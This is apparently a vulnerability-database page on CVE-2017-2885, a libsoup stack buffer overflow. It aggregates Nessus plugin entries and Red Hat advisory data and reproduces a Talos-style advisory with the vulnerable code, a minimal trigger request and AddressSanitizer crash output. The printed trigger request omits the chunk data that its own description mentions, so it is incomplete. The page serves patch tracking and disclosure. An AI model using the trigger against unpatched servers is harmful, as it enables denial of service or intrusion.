CVE-2017-2885 - Out-of-bounds Write vulnerability in multiple products

CVSS 9.8 - CRITICAL
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: HIGH
Integrity impact: HIGH
Availability impact: HIGH

Tags: network, low complexity, gnome, debian, redhat, CWE-787, critical, nessus

Summary

An exploitable stack based buffer overflow vulnerability exists in the GNOME libsoup 2.58. A specially crafted HTTP request can cause a stack overflow resulting in remote code execution. An attacker can send a special HTTP request to the vulnerable server to trigger this vulnerability.

Common Weakness Enumeration (CWE)

Nessus

  • NASL family: FreeBSD Local Security Checks
    NASL id: FREEBSD_PKG_8E7BBDDD833811E7867FB499BAEBFEAF.NASL
    description: Tobias Mueller reports : libsoup is susceptible to a stack based buffer overflow attack when using chunked encoding. Regardless of libsoup being used as a server or client.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 102553
    published: 2017-08-18
    reporter: This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/102553
    title: FreeBSD : libsoup -- stack based buffer overflow (8e7bbddd-8338-11e7-867f-b499baebfeaf)
  • NASL family: SuSE Local Security Checks
    NASL id: SUSE_SU-2017-2130-1.NASL
    description: This update for libsoup fixes the following issues : - A bug in the HTTP Chunked Encoding code has been fixed that could have been exploited by attackers to cause a stack-based buffer overflow in client or server code running libsoup (bsc#1052916, CVE-2017-2885). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 102414
    published: 2017-08-11
    reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/102414
    title: SUSE SLES12 Security Update : libsoup (SUSE-SU-2017:2130-1)
  • NASL family: PhotonOS Local Security Checks
    NASL id: PHOTONOS_PHSA-2018-1_0-0149.NASL
    description: An update of {'openssl', 'libsoup'} packages of Photon OS has been released.
    last seen: 2019-02-21
    modified: 2019-02-07
    plugin id: 111275
    published: 2018-07-24
    reporter: Tenable
    source: https://www.tenable.com/plugins/index.php?view=single&id=111275
    title: Photon OS 1.0 : openssl / libsoup (PhotonOS-PHSA-2018-1.0-0149) (deprecated)
  • NASL family: Scientific Linux Local Security Checks
    NASL id: SL_20170815_LIBSOUP_ON_SL7_X.NASL
    description: Security Fix(es) : - A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality. (CVE-2017-2885)
    last seen: 2020-03-18
    modified: 2017-08-22
    plugin id: 102670
    published: 2017-08-22
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/102670
    title: Scientific Linux Security Update : libsoup on SL7.x x86_64 (20170815)
  • NASL family: SuSE Local Security Checks
    NASL id: SUSE_SU-2018-2204-2.NASL
    description: This update for libsoup fixes the following issues : Security issue fixed : CVE-2018-12910: Fix crash when handling empty hostnames (bsc#1100097). CVE-2017-2885: Fix chunk decoding buffer overrun that could be exploited against either clients or servers (bsc#1052916). Bug fixes: bsc#1086036: translation-update-upstream commented out for Leap Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-03-18
    modified: 2019-01-09
    plugin id: 121042
    published: 2019-01-09
    reporter: This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/121042
    title: SUSE SLES12 Security Update : libsoup (SUSE-SU-2018:2204-2)
  • NASL family: PhotonOS Local Security Checks
    NASL id: PHOTONOS_PHSA-2018-2_0-0060.NASL
    description: An update of {'libtiff', 'glibc', 'libsoup'} packages of Photon OS has been released.
    last seen: 2019-02-21
    modified: 2019-02-07
    plugin id: 111309
    published: 2018-07-24
    reporter: Tenable
    source: https://www.tenable.com/plugins/index.php?view=single&id=111309
    title: Photon OS 2.0 : libtiff / glibc / libsoup (PhotonOS-PHSA-2018-2.0-0060) (deprecated)
  • NASL family: Ubuntu Local Security Checks
    NASL id: UBUNTU_USN-3383-1.NASL
    description: Aleksandar Nikolic discovered a stack based buffer overflow when handling chunked encoding. An attacker could use this to cause a denial of service or possibly execute arbitrary code. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 102417
    published: 2017-08-11
    reporter: Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/102417
    title: Ubuntu 14.04 LTS / 16.04 LTS / 17.04 : libsoup2.4 vulnerability (USN-3383-1)
  • NASL family: PhotonOS Local Security Checks
    NASL id: PHOTONOS_PHSA-2018-2_0-0060_LIBTIFF.NASL
    description: An update of the libtiff package has been released.
    last seen: 2020-03-17
    modified: 2019-02-07
    plugin id: 121958
    published: 2019-02-07
    reporter: This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/121958
    title: Photon OS 2.0: Libtiff PHSA-2018-2.0-0060
  • NASL family: Slackware Local Security Checks
    NASL id: SLACKWARE_SSA_2017-223-02.NASL
    description: New libsoup packages are available for Slackware 14.1, 14.2, and -current to fix a security issue.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 102433
    published: 2017-08-14
    reporter: This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/102433
    title: Slackware 14.1 / 14.2 / current : libsoup (SSA:2017-223-02)
  • NASL family: Gentoo Local Security Checks
    NASL id: GENTOO_GLSA-201709-26.NASL
    description: The remote host is affected by the vulnerability described in GLSA-201709-26 (libsoup: Arbitrary remote code execution) A stack based buffer overflow vulnerability was discovered in libsoup. Impact : A remote attacker, by using specially crafted HTTP requests, could execute arbitrary code with the privileges of the process. Workaround : There is no known workaround at this time.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 103485
    published: 2017-09-27
    reporter: This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/103485
    title: GLSA-201709-26 : libsoup: Arbitrary remote code execution
  • NASL family: SuSE Local Security Checks
    NASL id: OPENSUSE-2018-856.NASL
    description: This update for libsoup fixes the following issues : Security issue fixed : - CVE-2018-12910: Fix crash when handling empty hostnames (bsc#1100097). - CVE-2017-2885: Fix chunk decoding buffer overrun that could be exploited against either clients or servers (bsc#1052916). Bug fixes : - bsc#1086036: translation-update-upstream commented out for Leap This update was imported from the SUSE:SLE-12-SP2:Update update project.
    last seen: 2020-06-05
    modified: 2018-08-10
    plugin id: 111637
    published: 2018-08-10
    reporter: This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/111637
    title: openSUSE Security Update : libsoup (openSUSE-2018-856)
  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2017-1F4C82D73E.NASL
    description: Security fix for CVE-2017-2885 (stack based buffer overflow with HTTP Chunked Encoding). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-05
    modified: 2017-08-22
    plugin id: 102631
    published: 2017-08-22
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/102631
    title: Fedora 26 : mingw-libsoup (2017-1f4c82d73e)
  • NASL family: PhotonOS Local Security Checks
    NASL id: PHOTONOS_PHSA-2018-2_0-0060_GLIBC.NASL
    description: An update of the glibc package has been released.
    last seen: 2020-03-17
    modified: 2019-02-07
    plugin id: 121956
    published: 2019-02-07
    reporter: This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/121956
    title: Photon OS 2.0: Glibc PHSA-2018-2.0-0060
  • NASL family: PhotonOS Local Security Checks
    NASL id: PHOTONOS_PHSA-2018-1_0-0149_LIBSOUP.NASL
    description: An update of the libsoup package has been released.
    last seen: 2020-03-17
    modified: 2019-02-07
    plugin id: 121847
    published: 2019-02-07
    reporter: This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/121847
    title: Photon OS 1.0: Libsoup PHSA-2018-1.0-0149
  • NASL family: PhotonOS Local Security Checks
    NASL id: PHOTONOS_PHSA-2018-2_0-0060_LIBSOUP.NASL
    description: An update of the libsoup package has been released.
    last seen: 2020-03-17
    modified: 2019-02-07
    plugin id: 121957
    published: 2019-02-07
    reporter: This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/121957
    title: Photon OS 2.0: Libsoup PHSA-2018-2.0-0060
  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2017-B0EC173BD1.NASL
    description: Security fix for CVE-2017-2885 (stack based buffer overflow with HTTP Chunked Encoding). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-05
    modified: 2017-08-14
    plugin id: 102460
    published: 2017-08-14
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/102460
    title: Fedora 26 : libsoup (2017-b0ec173bd1)
  • NASL family: SuSE Local Security Checks
    NASL id: SUSE_SU-2018-2204-1.NASL
    description: This update for libsoup fixes the following issues: Security issue fixed : - CVE-2018-12910: Fix crash when handling empty hostnames (bsc#1100097). - CVE-2017-2885: Fix chunk decoding buffer overrun that could be exploited against either clients or servers (bsc#1052916). Bug fixes : - bsc#1086036: translation-update-upstream commented out for Leap Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 111574
    published: 2018-08-07
    reporter: This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/111574
    title: SUSE SLED12 / SLES12 Security Update : libsoup (SUSE-SU-2018:2204-1)
  • NASL family: Huawei Local Security Checks
    NASL id: EULEROS_SA-2019-1392.NASL
    description: According to the versions of the libsoup package installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities : - The get_cookies function in soup-cookie-jar.c in libsoup 2.63.2 allows attackers to have unspecified impact via an empty hostname.(CVE-2018-12910) - A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality.(CVE-2017-2885) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 124895
    published: 2019-05-14
    reporter: This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/124895
    title: EulerOS Virtualization for ARM 64 3.0.1.0 : libsoup (EulerOS-SA-2019-1392)
  • NASL family: Huawei Local Security Checks
    NASL id: EULEROS_SA-2017-1210.NASL
    description: According to the version of the libsoup packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality. (CVE-2017-2885) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-05-06
    modified: 2017-09-11
    plugin id: 103068
    published: 2017-09-11
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/103068
    title: EulerOS 2.0 SP2 : libsoup (EulerOS-SA-2017-1210)
  • NASL family: Red Hat Local Security Checks
    NASL id: REDHAT-RHSA-2017-2459.NASL
    description: An update for libsoup is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The libsoup packages provide an HTTP client and server library for GNOME. Security Fix(es) : * A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality. (CVE-2017-2885) Red Hat would like to thank Aleksandar Nikolic (Cisco Talos) for reporting this issue.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 102412
    published: 2017-08-11
    reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/102412
    title: RHEL 7 : libsoup (RHSA-2017:2459)
  • NASL family: PhotonOS Local Security Checks
    NASL id: PHOTONOS_PHSA-2018-1_0-0149_OPENSSL.NASL
    description: An update of the openssl package has been released.
    last seen: 2020-03-17
    modified: 2019-02-07
    plugin id: 121848
    published: 2019-02-07
    reporter: This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/121848
    title: Photon OS 1.0: Openssl PHSA-2018-1.0-0149
  • NASL family: SuSE Local Security Checks
    NASL id: SUSE_SU-2017-2129-1.NASL
    description: This update for libsoup fixes the following issues : - A bug in the HTTP Chunked Encoding code has been fixed that could have been exploited by attackers to cause a stack-based buffer overflow in client or server code running libsoup (bsc#1052916, CVE-2017-2885). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 102413
    published: 2017-08-11
    reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/102413
    title: SUSE SLED12 / SLES12 Security Update : libsoup (SUSE-SU-2017:2129-1)
  • NASL family: CentOS Local Security Checks
    NASL id: CENTOS_RHSA-2017-2459.NASL
    description: An update for libsoup is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The libsoup packages provide an HTTP client and server library for GNOME. Security Fix(es) : * A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality. (CVE-2017-2885) Red Hat would like to thank Aleksandar Nikolic (Cisco Talos) for reporting this issue.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 102764
    published: 2017-08-25
    reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/102764
    title: CentOS 7 : libsoup (CESA-2017:2459)
  • NASL family: SuSE Local Security Checks
    NASL id: OPENSUSE-2017-914.NASL
    description: This update for libsoup fixes the following issues : - A bug in the HTTP Chunked Encoding code has been fixed that could have been exploited by attackers to cause a stack-based buffer overflow in client or server code running libsoup (bsc#1052916, CVE-2017-2885). This update was imported from the SUSE:SLE-12-SP2:Update update project.
    last seen: 2020-06-05
    modified: 2017-08-14
    plugin id: 102468
    published: 2017-08-14
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/102468
    title: openSUSE Security Update : libsoup (openSUSE-2017-914)
  • NASL family: Oracle Linux Local Security Checks
    NASL id: ORACLELINUX_ELSA-2017-2459.NASL
    description: From Red Hat Security Advisory 2017:2459 : An update for libsoup is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The libsoup packages provide an HTTP client and server library for GNOME. Security Fix(es) : * A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality. (CVE-2017-2885) Red Hat would like to thank Aleksandar Nikolic (Cisco Talos) for reporting this issue.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 102409
    published: 2017-08-11
    reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/102409
    title: Oracle Linux 7 : libsoup (ELSA-2017-2459)
  • NASL family: Huawei Local Security Checks
    NASL id: EULEROS_SA-2017-1209.NASL
    description: According to the version of the libsoup packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality. (CVE-2017-2885) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-05-06
    modified: 2017-09-11
    plugin id: 103067
    published: 2017-09-11
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/103067
    title: EulerOS 2.0 SP1 : libsoup (EulerOS-SA-2017-1209)
  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2017-872A0A9A85.NASL
    description: Security fix for CVE-2017-2885 (stack based buffer overflow with HTTP Chunked Encoding). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-05
    modified: 2017-08-14
    plugin id: 102457
    published: 2017-08-14
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/102457
    title: Fedora 25 : libsoup (2017-872a0a9a85)
  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2017-C9D8011D69.NASL
    description: Security fix for CVE-2017-2885 (stack based buffer overflow with HTTP Chunked Encoding). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-05
    modified: 2017-08-24
    plugin id: 102721
    published: 2017-08-24
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/102721
    title: Fedora 25 : mingw-libsoup (2017-c9d8011d69)
  • NASL family: Debian Local Security Checks
    NASL id: DEBIAN_DSA-3929.NASL
    description: Aleksandar Nikolic of Cisco Talos discovered a stack-based buffer overflow vulnerability in libsoup2.4, a HTTP library implementation in C. A remote attacker can take advantage of this flaw by sending a specially crafted HTTP request to cause an application using the libsoup2.4 library to crash (denial of service), or potentially execute arbitrary code.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 102370
    published: 2017-08-11
    reporter: This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/102370
    title: Debian DSA-3929-1 : libsoup2.4 - security update

Redhat

advisories
  bugzilla
    id: 1479281
    title: CVE-2017-2885 libsoup: Stack based buffer overflow with HTTP Chunked Encoding
  oval
    OR
      • comment: Red Hat Enterprise Linux must be installed
        oval: oval:com.redhat.rhba:tst:20070304026
      • AND
        • comment: Red Hat Enterprise Linux 7 is installed
          oval: oval:com.redhat.rhba:tst:20150364027
        • OR
          • AND
            • comment: libsoup-devel is earlier than 0:2.56.0-4.el7_4
              oval: oval:com.redhat.rhsa:tst:20172459001
            • comment: libsoup-devel is signed with Red Hat redhatrelease2 key
              oval: oval:com.redhat.rhsa:tst:20111102004
          • AND
            • comment: libsoup is earlier than 0:2.56.0-4.el7_4
              oval: oval:com.redhat.rhsa:tst:20172459003
            • comment: libsoup is signed with Red Hat redhatrelease2 key
              oval: oval:com.redhat.rhsa:tst:20111102002
  rhsa
    id: RHSA-2017:2459
    released: 2017-08-10
    severity: Important
    title: RHSA-2017:2459: libsoup security update (Important)
rpms
  • libsoup-0:2.56.0-4.el7_4
  • libsoup-debuginfo-0:2.56.0-4.el7_4
  • libsoup-devel-0:2.56.0-4.el7_4

Seebug

bulletinFamilyexploit
description### Summary An exploitable stack based buffer overflow vulnerability exists in the GNOME libsoup 2.58. A specially crafted HTTP request can cause a stack overflow resulting in remote code execution. An attacker can send a special HTTP request to the vulnerable server to trigger this vulnerability. ### Tested Versions GNOME libsoup 2.58 ### Product URLs https://wiki.gnome.org/action/show/Projects/libsoup ### CVSSv3 Score 9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H ### CWE CWE-121: Stack-based Buffer Overflow ### Details GNOME libsoup is a library implementing client and server side code for dealing with HTTP requests and responses. It is used to implement custom web servers or clients. Usually it is used embedded in other applications such as media streaming servers for basic web server functionality. It can also be used standalone and embedded in hardware devices. When processing an HTTP request which contains chunk encoded data, an improper bounds checking can lead to large memory copy operation which can overflow a statically sized buffer on the stack. Buffer that is being overflown is located in function `soup_body_input_stream_read_chunked` in file libsoup/soup-body-input-stream.c: ``` static gssize soup_body_input_stream_read_chunked (SoupBodyInputStream *bistream, void *buffer, gsize count, gboolean blocking, GCancellable *cancellable, GError **error) SoupFilterInputStream *fstream = SOUP_FILTER_INPUT_STREAM (bistream->priv->base_stream); char metabuf[128]; [1] gssize nread; gboolean got_line; ``` The buffer is allocated on the stack at [1]. 
While further processing the body of a chunk-encoded HTTP request, function `soup_filter_input_stream_read_line` is called: ``` case SOUP_BODY_INPUT_STREAM_STATE_CHUNK_END: nread = soup_filter_input_stream_read_line ( SOUP_FILTER_INPUT_STREAM (bistream->priv->base_stream), metabuf, sizeof (metabuf), blocking, &got_line, cancellable, error); ``` In the above code, we can see `metabuf` and it’s length being passed to the `soup_filter_input_stream_read_line` function which is just a wrapper around `soup_filter_input_stream_read_until` being called with new line as delimiter: ``` gssize soup_filter_input_stream_read_line (SoupFilterInputStream *fstream, void *buffer, gsize length, gboolean blocking, gboolean *got_line, GCancellable *cancellable, GError **error) return soup_filter_input_stream_read_until (fstream, buffer, length, "\n", 1, blocking, TRUE, got_line, cancellable, error); ``` Function `soup_filter_input_stream_read_until` does the actual reading from the input stream into the buffer. ``` /* Scan for the boundary */ end = buf + fstream->priv->buf->len; [2] if (!eof) end -= boundary_length; for (p = buf; p <= end; p++) { [3] if (*p == *(guint8*)boundary && !memcmp (p, boundary, boundary_length)) { [4] if (include_boundary) p += boundary_length; *got_boundary = TRUE; break; if (!*got_boundary && fstream->priv->buf->len < length && !eof) goto fill_buffer; /* Return everything up to 'p' (which is either just after the boundary if * include_boundary is TRUE, just before the boundary if include_boundary is * FALSE, @boundary_len - 1 bytes before the end of the buffer, or end-of- * file). */ return read_from_buf (fstream, buffer, p - buf); [5] ``` In the above code, at [2] a pointer to the end of the stream data is calculated, at [3] it is used as an end condition in a for loop which is looking for a set delimiter (variable boundary, a newline character in this case) at [4]. Pointer p is being incremented in the loop until newline is found. 
Finally, at [5], the function read_from_buf is called with the input stream as source, the buffer as destination and the offset of the newline character as length. No check that the buffer is large enough is performed anywhere. In the function read_from_buf the memcpy call can thus lead to a buffer overflow:

```
static gssize
read_from_buf (SoupFilterInputStream *fstream, gpointer buffer, gsize count)
{
	GByteArray *buf = fstream->priv->buf;

	/* count is capped only by the data available in the internal buffer,
	 * never by the size of the destination buffer supplied by the caller */
	if (buf->len < count)
		count = buf->len;
	memcpy (buffer, buf->data, count);

	/* remainder of the function (internal buffer bookkeeping) is not shown in the advisory */
	return count;
}
```

To trigger this vulnerability, a simple HTTP request like the following is enough:

```
GET / HTTP/1.0
Transfer-Encoding: chunked
```

When parsing this request, the first chunk will be of size 1, and then the parser proceeds to scan the overly long series of A characters for a new line. A string longer than 128 characters will overflow the buffer. This can be abused in order to crash the server or achieve remote code execution in the context of the server.

### Crash Information

```
Address Sanitizer output:
Listening on http://0.0.0.0:12323/
Listening on http://[::]:12323/
Waiting for requests...
=================================================================
==119749==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffb280 at pc 0x0000004a3bfd bp 0x7fffffffb010 sp 0x7fffffffa7c0
WRITE of size 151 at 0x7fffffffb280 thread T0
    #0 0x4a3bfc in __asan_memcpy ??:?
    #1 0x4a3bfc in ?? ??:0
    #2 0x7ffff7962126 in read_from_buf /home/user/libsoup/libsoup/libsoup/soup-filter-input-stream.c:59
    #3 0x7ffff7962126 in soup_filter_input_stream_read_until /home/user/libsoup/libsoup/libsoup/soup-filter-input-stream.c:278
    #4 0x7ffff7962126 in ?? ??:0
    #5 0x7ffff7961475 in soup_filter_input_stream_read_line /home/user/libsoup/libsoup/libsoup/soup-filter-input-stream.c:183
    #6 0x7ffff7961475 in ?? ??:0
    #7 0x7ffff791fd45 in soup_body_input_stream_read_chunked /home/user/libsoup/libsoup/libsoup/soup-body-input-stream.c:194
    #8 0x7ffff791fd45 in read_internal /home/user/libsoup/libsoup/libsoup/soup-body-input-stream.c:249
    #9 0x7ffff791fd45 in ?? ??:0
    #10 0x7ffff79966b0 in io_read /home/user/libsoup/libsoup/libsoup/soup-message-io.c:762
    #11 0x7ffff79966b0 in ?? ??:0
    #12 0x7ffff79901b5 in io_run_until /home/user/libsoup/libsoup/libsoup/soup-message-io.c:982
    #13 0x7ffff79901b5 in ?? ??:0
    #14 0x7ffff7993ee3 in io_run /home/user/libsoup/libsoup/libsoup/soup-message-io.c:1053
    #15 0x7ffff7993ee3 in ?? ??:0
    #16 0x7ffff7999939 in soup_message_read_request /home/user/libsoup/libsoup/libsoup/soup-message-server-io.c:304
    #17 0x7ffff7999939 in ?? ??:0
    #18 0x7ffff71a00a6 in g_cclosure_marshal_VOID__OBJECTv ??:?
    #19 0x7ffff71a00a6 in ?? ??:0
    #20 0x7ffff719d1d3 in g_closure_invoke ??:?
    #21 0x7ffff719d1d3 in ?? ??:0
    #22 0x7ffff71b79a5 in g_signal_emit_valist ??:?
    #23 0x7ffff71b79a5 in ?? ??:0
    #24 0x7ffff71b808e in g_signal_emit ??:?
    #25 0x7ffff71b808e in ?? ??:0
    #26 0x7ffff79e894a in listen_watch /home/user/libsoup/libsoup/libsoup/soup-socket.c:1237
    #27 0x7ffff79e894a in ?? ??:0
    #28 0x7ffff6ec6049 in g_main_context_dispatch ??:?
    #29 0x7ffff6ec6049 in ?? ??:0
    #30 0x7ffff6ec63ef in g_main_context_dispatch ??:?
    #31 0x7ffff6ec63ef in ?? ??:0
    #32 0x7ffff6ec6711 in g_main_loop_run ??:?
    #33 0x7ffff6ec6711 in ?? ??:0
    #34 0x4eb8cc in main /home/user/libsoup/libsoup/examples/simple-httpd.c:360
    #35 0x4eb8cc in ?? ??:0
    #36 0x7ffff5f8a82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
    #37 0x7ffff5f8a82f in ?? ??:0
    #38 0x419dc8 in _start ??:?
    #39 0x419dc8 in ?? ??:0

Address 0x7fffffffb280 is located in stack of thread T0 at offset 160 in frame
    #0 0x7ffff791f8af in read_internal /home/user/libsoup/libsoup/libsoup/soup-body-input-stream.c:237
    #1 0x7ffff791f8af in ?? ??:0

  This frame has 2 object(s):
    [32, 160) 'metabuf.i'
    [192, 196) 'got_line.i' <== Memory access at offset 160 partially underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/user/libsoup/libsoup/examples/.libs/simple-httpd+0x4a3bfc)
Shadow bytes around the buggy address:
  0x10007fff7600: 00 00 00 00 f1 f1 f1 f1 00 f3 f3 f3 00 00 00 00
  0x10007fff7610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10007fff7620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10007fff7630: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
  0x10007fff7640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10007fff7650:[f2]f2 f2 f2 04 f3 f3 f3 00 00 00 00 00 00 00 00
  0x10007fff7660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10007fff7670: 00 00 00 00 ca ca ca ca 00 00 00 00 00 00 00 00
